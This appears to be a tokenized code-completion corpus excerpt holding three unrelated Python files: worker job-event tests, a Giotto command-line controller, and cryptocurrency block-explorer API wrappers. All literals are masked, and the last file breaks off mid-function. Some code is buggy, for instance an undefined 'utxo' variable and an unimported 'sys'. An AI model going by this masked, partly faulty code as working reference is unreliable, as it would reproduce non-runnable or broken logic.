"<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:2> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:3> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:2> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:3> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> def test_io_hooks_mongodb ( worker ) : <EOL> worker . start ( flags = "<STR_LIT>" ) <EOL> worker . send_task ( <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:test>" : "<STR_LIT>" } <EOL> ) <EOL> events = json . loads ( <EOL> worker . send_task ( "<STR_LIT>" , { } ) ) <EOL> job_events = [ x for x in events if x . get ( "<STR_LIT>" ) ] <EOL> for evt in job_events : <EOL> print evt <EOL> assert len ( job_events ) == <NUM_LIT:4> * <NUM_LIT:2> <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:1> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:2> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:3> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:2> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:3> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:2> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:3> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:4> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:5> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:4> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:5> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:4> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:5> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:6> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:7> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:6> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:7> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:6> ] [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert job_events [ <NUM_LIT:7> ] [ "<STR_LIT>" ] == "<STR_LIT>" </s>
<s> import os <EOL> from giotto . utils import parse_kwargs <EOL> from giotto . controllers import GiottoController <EOL> from giotto . control import Redirection <EOL> cmd_execution_snippet = """<STR_LIT>""" <EOL> def make_cmd_invocation ( invocation , args , kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not invocation . endswith ( '<STR_LIT:/>' ) : <EOL> invocation += '<STR_LIT:/>' <EOL> if not invocation . startswith ( '<STR_LIT:/>' ) : <EOL> invocation = '<STR_LIT:/>' + invocation <EOL> cmd = invocation <EOL> for arg in args : <EOL> cmd += str ( arg ) + "<STR_LIT:/>" <EOL> rendered_kwargs = [ ] <EOL> for k , v in kwargs . items ( ) : <EOL> rendered_kwargs . append ( "<STR_LIT>" % ( k , v ) ) <EOL> return [ '<STR_LIT>' , cmd ] + rendered_kwargs <EOL> class CMDRequest ( object ) : <EOL> def __init__ ( self , argv ) : <EOL> self . enviornment = os . environ <EOL> self . argv = argv <EOL> class CMDController ( GiottoController ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> default_mimetype = '<STR_LIT>' <EOL> def get_invocation ( self ) : <EOL> return self . request . argv [ <NUM_LIT:1> ] <EOL> def get_controller_name ( self ) : <EOL> return '<STR_LIT>' <EOL> def get_raw_data ( self ) : <EOL> """<STR_LIT>""" <EOL> arguments = self . request . argv [ <NUM_LIT:1> : ] <EOL> if not arguments [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> arguments = arguments [ <NUM_LIT:1> : ] <EOL> return parse_kwargs ( arguments ) <EOL> def get_concrete_response ( self ) : <EOL> result = self . get_data_response ( ) <EOL> if type ( result ) == Redirection : <EOL> invocation , args , kwargs = result . rendered_invocation <EOL> rendered_invocation = make_cmd_invocation ( invocation , args , kwargs ) <EOL> req = CMDRequest ( rendered_invocation ) <EOL> return CMDController ( req , self . manifest , self . model_mock ) <EOL> else : <EOL> response = { <EOL> '<STR_LIT>' : [ result [ '<STR_LIT:body>' ] ] , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> stdout = response [ '<STR_LIT>' ] <EOL> if hasattr ( stdout , '<STR_LIT>' ) : <EOL> print ( stdout . write ( ) ) <EOL> else : <EOL> for line in stdout : <EOL> print ( line ) <EOL> for line in response [ '<STR_LIT>' ] : <EOL> sys . stderr . write ( line ) <EOL> def persist ( self , persist , response ) : <EOL> print ( "<STR_LIT>" ) <EOL> for key , value in persist . iteritems ( ) : <EOL> print ( "<STR_LIT>" % ( key . upper ( ) , value ) ) <EOL> def get_primitive ( self , name ) : <EOL> if name == '<STR_LIT>' : <EOL> return self . get_raw_data ( ) <EOL> elif name == '<STR_LIT>' : <EOL> return getattr ( self . request , '<STR_LIT:user>' , None ) </s>
<s> import json <EOL> from . core import Service , NoService , NoData , SkipThisService , currency_to_protocol <EOL> import arrow <EOL> class Bitstamp ( Service ) : <EOL> service_id = <NUM_LIT:1> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_current_price ( self , crypto , fiat ) : <EOL> if fiat . lower ( ) != '<STR_LIT>' : <EOL> raise SkipThisService ( '<STR_LIT>' ) <EOL> url = "<STR_LIT>" <EOL> response = self . get_url ( url ) . json ( ) <EOL> return float ( response [ '<STR_LIT>' ] ) <EOL> class BlockCypher ( Service ) : <EOL> service_id = <NUM_LIT:2> <EOL> supported_cryptos = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> explorer_blocknum_url = "<STR_LIT>" <EOL> base_api_url = "<STR_LIT>" <EOL> json_address_balance_url = base_api_url + "<STR_LIT>" <EOL> json_txs_url = json_address_balance_url <EOL> json_unspent_outputs_url = base_api_url + "<STR_LIT>" <EOL> json_blockhash_url = base_api_url + "<STR_LIT>" <EOL> json_blocknum_url = base_api_url + "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_address_balance_url . format ( address = address , crypto = crypto ) <EOL> response = self . get_url ( url ) <EOL> if confirmations == <NUM_LIT:0> : <EOL> return response . json ( ) [ '<STR_LIT>' ] / <NUM_LIT> <EOL> elif confirmations == <NUM_LIT:1> : <EOL> return response . json ( ) [ '<STR_LIT>' ] / <NUM_LIT> <EOL> else : <EOL> raise SkipThisService ( "<STR_LIT>" ) <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_unspent_outputs_url . format ( address = address , crypto = crypto ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] : <EOL> if utxo [ '<STR_LIT>' ] < confirmations : <EOL> continue <EOL> utxos . append ( dict ( <EOL> amount = utxo [ '<STR_LIT:value>' ] , <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> address = address , <EOL> confirmations = utxo [ '<STR_LIT>' ] , <EOL> ) ) <EOL> return utxos <EOL> def get_transactions ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_txs_url . format ( address = address , crypto = crypto ) <EOL> transactions = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] : <EOL> if utxo [ '<STR_LIT>' ] < confirmations : <EOL> continue <EOL> transactions . append ( dict ( <EOL> date = arrow . get ( tx [ '<STR_LIT>' ] ) . datetime , <EOL> amount = tx [ '<STR_LIT:value>' ] / <NUM_LIT> , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> confirmations = utxo [ '<STR_LIT>' ] <EOL> ) ) <EOL> return transactions <EOL> def get_optimal_fee ( self , crypto , tx_bytes ) : <EOL> url = "<STR_LIT>" % crypto <EOL> fee_kb = self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] <EOL> return int ( tx_bytes * fee_kb / <NUM_LIT> ) <EOL> def get_block ( self , crypto , block_hash = '<STR_LIT>' , block_number = '<STR_LIT>' , latest = False ) : <EOL> if block_hash : <EOL> url = self . json_blockhash_url . format ( blockhash = block_hash , crypto = crypto ) <EOL> elif block_number : <EOL> url = self . json_blocknum_url . format ( blocknum = block_number , crypto = crypto ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> confirmations = r [ '<STR_LIT>' ] + <NUM_LIT:1> , <EOL> time = arrow . get ( r [ '<STR_LIT>' ] ) . datetime , <EOL> sent_value = r [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> total_fees = r [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> merkle_root = r [ '<STR_LIT>' ] , <EOL> previous_hash = r [ '<STR_LIT>' ] , <EOL> tx_count = r [ '<STR_LIT>' ] , <EOL> txids = r [ '<STR_LIT>' ] <EOL> ) <EOL> class BlockSeer ( Service ) : <EOL> """<STR_LIT>""" <EOL> service_id = <NUM_LIT:3> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_blocknum_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> json_address_balance_url = "<STR_LIT>" <EOL> json_txs_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_address_balance_url . format ( address = address ) <EOL> return self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] / <NUM_LIT> <EOL> def get_transactions ( self , crypo , address ) : <EOL> url = self . json_txs_url . format ( address = address ) <EOL> transactions = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT:address>' ] [ '<STR_LIT>' ] : <EOL> transactions . append ( dict ( <EOL> date = arrow . get ( tx [ '<STR_LIT:time>' ] ) . datetime , <EOL> amount = tx [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> ) ) <EOL> return transactions <EOL> class SmartBitAU ( Service ) : <EOL> service_id = <NUM_LIT:4> <EOL> api_homepage = "<STR_LIT>" <EOL> base_url = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_blocknum_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> confirmed = float ( r [ '<STR_LIT:address>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> if confirmations > <NUM_LIT:1> : <EOL> return confirmed <EOL> else : <EOL> return confirmed + float ( r [ '<STR_LIT:address>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> def get_balance_multi ( self , crypto , addresses , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , "<STR_LIT:U+002C>" . join ( addresses ) ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> ret = { } <EOL> for data in response [ '<STR_LIT>' ] : <EOL> bal = float ( data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> if confirmations == <NUM_LIT:0> : <EOL> bal += float ( data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> ret [ data [ '<STR_LIT:address>' ] ] = bal <EOL> return ret <EOL> def get_transactions ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> transactions = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) [ '<STR_LIT:address>' ] [ '<STR_LIT>' ] : <EOL> out_amount = sum ( float ( x [ '<STR_LIT:value>' ] ) for x in tx [ '<STR_LIT>' ] if address in x [ '<STR_LIT>' ] ) <EOL> in_amount = sum ( float ( x [ '<STR_LIT:value>' ] ) for x in tx [ '<STR_LIT>' ] if address in x [ '<STR_LIT>' ] ) <EOL> transactions . append ( dict ( <EOL> amount = out_amount - in_amount , <EOL> date = arrow . get ( tx [ '<STR_LIT:time>' ] ) . datetime , <EOL> fee = float ( tx [ '<STR_LIT>' ] ) , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> confirmations = tx [ '<STR_LIT>' ] , <EOL> ) ) <EOL> return transactions <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] : <EOL> utxos . append ( dict ( <EOL> amount = utxo [ '<STR_LIT>' ] , <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT:n>' ] ) , <EOL> address = address , <EOL> confirmations = utxo [ '<STR_LIT>' ] , <EOL> scriptpubkey_hex = utxo [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> scriptpubkey_asm = utxo [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> ) ) <EOL> return utxos <EOL> def push_tx ( self , crypto , tx_hex ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" % self . base_url <EOL> return self . post_url ( url , { '<STR_LIT>' : tx_hex } ) . content <EOL> def get_mempool ( self ) : <EOL> url = "<STR_LIT>" % self . base_url <EOL> txs = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] : <EOL> txs . append ( dict ( <EOL> first_seen = arrow . get ( tx [ '<STR_LIT>' ] ) . datetime , <EOL> size = tx [ '<STR_LIT:size>' ] , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> fee = float ( tx [ '<STR_LIT>' ] ) , <EOL> ) ) <EOL> return txs <EOL> class Blockr ( Service ) : <EOL> service_id = <NUM_LIT:5> <EOL> supported_cryptos = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> explorer_blocknum_url = "<STR_LIT>" <EOL> explorer_latest_block = "<STR_LIT>" <EOL> json_address_url = "<STR_LIT>" <EOL> json_single_tx_url = "<STR_LIT>" <EOL> json_txs_url = url = "<STR_LIT>" <EOL> json_unspent_outputs_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_address_url . format ( address = address , crypto = crypto ) <EOL> response = self . get_url ( url ) <EOL> return response . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> def get_balance_multi ( self , crypto , addresses , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_address_url . format ( address = '<STR_LIT:U+002C>' . join ( addresses ) , crypto = crypto ) <EOL> balances = { } <EOL> for bal in self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] : <EOL> balances [ bal [ '<STR_LIT:address>' ] ] = bal [ '<STR_LIT>' ] <EOL> return balances <EOL> def _format_tx ( self , tx , address ) : <EOL> return dict ( <EOL> date = arrow . get ( tx [ '<STR_LIT>' ] ) . datetime , <EOL> amount = tx [ '<STR_LIT>' ] , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> confirmations = tx [ '<STR_LIT>' ] , <EOL> addresses = [ address ] , <EOL> ) <EOL> def get_transactions ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_txs_url . format ( address = address , crypto = crypto ) <EOL> response = self . get_url ( url ) <EOL> transactions = [ ] <EOL> for tx in response . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] : <EOL> transactions . append ( self . _format_tx ( tx , address ) ) <EOL> return transactions <EOL> def get_transactions_multi ( self , crypto , addresses , confirmation = <NUM_LIT:1> ) : <EOL> url = self . json_txs_url . format ( address = '<STR_LIT:U+002C>' . join ( addresses ) , crypto = crypto ) <EOL> transactions = [ ] <EOL> for data in self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] : <EOL> for tx in data [ '<STR_LIT>' ] : <EOL> transactions . append ( self . _format_tx ( tx , data [ '<STR_LIT:address>' ] ) ) <EOL> return transactions <EOL> def _format_single_tx ( self , tx ) : <EOL> ins = [ { '<STR_LIT:address>' : x [ '<STR_LIT:address>' ] , '<STR_LIT>' : float ( x [ '<STR_LIT>' ] ) * - <NUM_LIT:1> } for x in tx [ '<STR_LIT>' ] ] <EOL> outs = [ { '<STR_LIT:address>' : x [ '<STR_LIT:address>' ] , '<STR_LIT>' : float ( x [ '<STR_LIT>' ] ) } for x in tx [ '<STR_LIT>' ] ] <EOL> return dict ( <EOL> time = arrow . get ( tx [ '<STR_LIT>' ] ) . datetime , <EOL> block_number = tx [ '<STR_LIT>' ] , <EOL> inputs = ins , <EOL> outputs = outs , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> total_in = sum ( x [ '<STR_LIT>' ] for x in ins ) , <EOL> total_out = sum ( x [ '<STR_LIT>' ] for x in outs ) , <EOL> confirmations = tx [ '<STR_LIT>' ] , <EOL> fee = float ( tx [ '<STR_LIT>' ] ) <EOL> ) <EOL> def get_single_transaction ( self , crypto , txid ) : <EOL> url = self . json_single_tx_url . format ( crypto = crypto , txid = txid ) <EOL> r = self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] <EOL> return self . _format_single_tx ( r ) <EOL> def get_single_transaction_multi ( self , crypto , txids ) : <EOL> url = self . json_single_tx_url . format ( crypto = crypto , txid = '<STR_LIT:U+002C>' . join ( txids ) ) <EOL> txs = [ ] <EOL> for tx in self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] : <EOL> txs . append ( self . _format_single_tx ( tx ) ) <EOL> return txs <EOL> def _format_utxo ( self , utxo , address ) : <EOL> return dict ( <EOL> amount = currency_to_protocol ( utxo [ '<STR_LIT>' ] ) , <EOL> address = address , <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT:n>' ] ) , <EOL> confirmations = utxo [ '<STR_LIT>' ] <EOL> ) <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_unspent_outputs_url . format ( address = address , crypto = crypto ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] : <EOL> cons = utxo [ '<STR_LIT>' ] <EOL> if cons < confirmations : <EOL> continue <EOL> utxos . append ( self . _format_utxo ( utxo , address ) ) <EOL> return utxos <EOL> def get_unspent_outputs_multi ( self , crypto , addresses , confirmations = <NUM_LIT:1> ) : <EOL> url = self . json_unspent_outputs_url . format ( address = '<STR_LIT:U+002C>' . join ( addresses ) , crypto = crypto ) <EOL> utxos = [ ] <EOL> for data in self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] : <EOL> for utxo in data [ '<STR_LIT>' ] : <EOL> cons = utxo [ '<STR_LIT>' ] <EOL> if cons < confirmations : <EOL> continue <EOL> utxos . append ( self . _format_utxo ( utxo , data [ '<STR_LIT:address>' ] ) ) <EOL> return utxos <EOL> def push_tx ( self , crypto , tx_hex ) : <EOL> url = "<STR_LIT>" % crypto <EOL> resp = self . post_url ( url , { '<STR_LIT>' : tx_hex } ) . json ( ) <EOL> if resp [ '<STR_LIT:status>' ] == '<STR_LIT>' : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % ( <EOL> resp [ '<STR_LIT:code>' ] , resp [ '<STR_LIT:data>' ] , resp [ '<STR_LIT:message>' ] <EOL> ) <EOL> ) <EOL> return resp [ '<STR_LIT:data>' ] <EOL> def get_block ( self , crypto , block_hash = '<STR_LIT>' , block_number = '<STR_LIT>' , latest = False ) : <EOL> url = "<STR_LIT>" % ( <EOL> crypto , <EOL> block_hash if block_hash else '<STR_LIT>' , <EOL> block_number if block_number else '<STR_LIT>' , <EOL> '<STR_LIT>' if latest else '<STR_LIT>' <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] <EOL> return dict ( <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> time = arrow . get ( r [ '<STR_LIT>' ] ) . datetime , <EOL> sent_value = r [ '<STR_LIT>' ] , <EOL> total_fees = float ( r [ '<STR_LIT>' ] ) , <EOL> mining_difficulty = r [ '<STR_LIT>' ] , <EOL> size = int ( r [ '<STR_LIT:size>' ] ) , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> merkle_root = r [ '<STR_LIT>' ] , <EOL> previous_hash = r [ '<STR_LIT>' ] , <EOL> next_hash = r [ '<STR_LIT>' ] , <EOL> tx_count = r [ '<STR_LIT>' ] , <EOL> ) <EOL> class Toshi ( Service ) : <EOL> api_homepage = "<STR_LIT>" <EOL> service_id = <NUM_LIT:6> <EOL> url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . url , address ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> return response [ '<STR_LIT>' ] / <NUM_LIT> <EOL> def get_transactions ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . url , address ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> if confirmations == <NUM_LIT:0> : <EOL> to_iterate = response [ '<STR_LIT>' ] + response [ '<STR_LIT>' ] <EOL> else : <EOL> to_iterate = response [ '<STR_LIT>' ] <EOL> transactions = [ ] <EOL> for tx in to_iterate : <EOL> if tx [ '<STR_LIT>' ] < confirmations : <EOL> continue <EOL> transactions . append ( dict ( <EOL> amount = sum ( [ x [ '<STR_LIT>' ] / <NUM_LIT> for x in tx [ '<STR_LIT>' ] if address in x [ '<STR_LIT>' ] ] ) , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> date = arrow . get ( tx [ '<STR_LIT>' ] ) . datetime , <EOL> confirmations = tx [ '<STR_LIT>' ] <EOL> ) ) <EOL> return transactions <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . url , address ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> utxos = [ ] <EOL> for utxo in response : <EOL> cons = utxo [ '<STR_LIT>' ] <EOL> if cons < confirmations : <EOL> continue <EOL> utxos . append ( dict ( <EOL> amount = utxo [ '<STR_LIT>' ] , <EOL> address = address , <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> confirmations = cons <EOL> ) ) <EOL> return utxos <EOL> def push_tx ( self , crypto , tx_hex ) : <EOL> url = "<STR_LIT>" % ( self . url , tx_hex ) <EOL> return self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] <EOL> def get_block ( self , crypto , block_hash = '<STR_LIT>' , block_number = '<STR_LIT>' , latest = False ) : <EOL> if latest : <EOL> url = "<STR_LIT>" % self . url <EOL> else : <EOL> url = "<STR_LIT>" % ( <EOL> self . url , block_hash if block_hash else '<STR_LIT>' , <EOL> block_number if block_number else '<STR_LIT>' <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> time = arrow . get ( r [ '<STR_LIT:time>' ] ) . datetime , <EOL> sent_value = r [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> total_fees = r [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> mining_difficulty = r [ '<STR_LIT>' ] , <EOL> size = r [ '<STR_LIT:size>' ] , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> merkle_root = r [ '<STR_LIT>' ] , <EOL> previous_hash = r [ '<STR_LIT>' ] , <EOL> next_hash = r [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] if len ( r [ '<STR_LIT>' ] ) else None , <EOL> txids = sorted ( r [ '<STR_LIT>' ] ) , <EOL> tx_count = len ( r [ '<STR_LIT>' ] ) <EOL> ) <EOL> class BTCE ( Service ) : <EOL> service_id = <NUM_LIT:7> <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_current_price ( self , crypto , fiat ) : <EOL> pair = "<STR_LIT>" % ( crypto . lower ( ) , fiat . lower ( ) ) <EOL> url = "<STR_LIT>" + pair <EOL> response = self . get_url ( url ) . json ( ) <EOL> return response [ pair ] [ '<STR_LIT>' ] <EOL> class Cryptonator ( Service ) : <EOL> service_id = <NUM_LIT:8> <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_current_price ( self , crypto , fiat ) : <EOL> pair = "<STR_LIT>" % ( crypto , fiat ) <EOL> url = "<STR_LIT>" % pair <EOL> response = self . get_url ( url ) . json ( ) <EOL> return float ( response [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> class Winkdex ( Service ) : <EOL> service_id = <NUM_LIT:9> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_current_price ( self , crypto , fiat ) : <EOL> if fiat != '<STR_LIT>' : <EOL> raise SkipThisService ( "<STR_LIT>" ) <EOL> url = "<STR_LIT>" <EOL> return self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> class ChainSo ( Service ) : <EOL> service_id = <NUM_LIT:11> <EOL> api_homepage = "<STR_LIT>" <EOL> base_url = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> name = "<STR_LIT>" <EOL> def get_current_price ( self , crypto , fiat ) : <EOL> url = "<STR_LIT>" % ( self . base_url , crypto , fiat ) <EOL> resp = self . get_url ( url ) . json ( ) <EOL> items = resp [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> if len ( items ) == <NUM_LIT:0> : <EOL> raise SkipThisService ( "<STR_LIT>" % ( crypto , fiat ) ) <EOL> self . name = "<STR_LIT>" % items [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> return float ( items [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( <EOL> self . base_url , crypto , address , confirmations <EOL> ) <EOL> response = self . get_url ( url ) <EOL> return float ( response . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] ) <EOL> def get_transactions ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , crypto , address ) <EOL> response = self . get_url ( url ) <EOL> transactions = [ ] <EOL> for tx in response . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] : <EOL> tx_cons = int ( tx [ '<STR_LIT>' ] ) <EOL> if tx_cons < confirmations : <EOL> continue <EOL> transactions . append ( dict ( <EOL> date = arrow . get ( tx [ '<STR_LIT:time>' ] ) . datetime , <EOL> amount = float ( tx [ '<STR_LIT:value>' ] ) , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> confirmations = tx_cons , <EOL> ) ) <EOL> return transactions <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , crypto , address ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . json ( ) [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] : <EOL> utxos . append ( dict ( <EOL> amount = 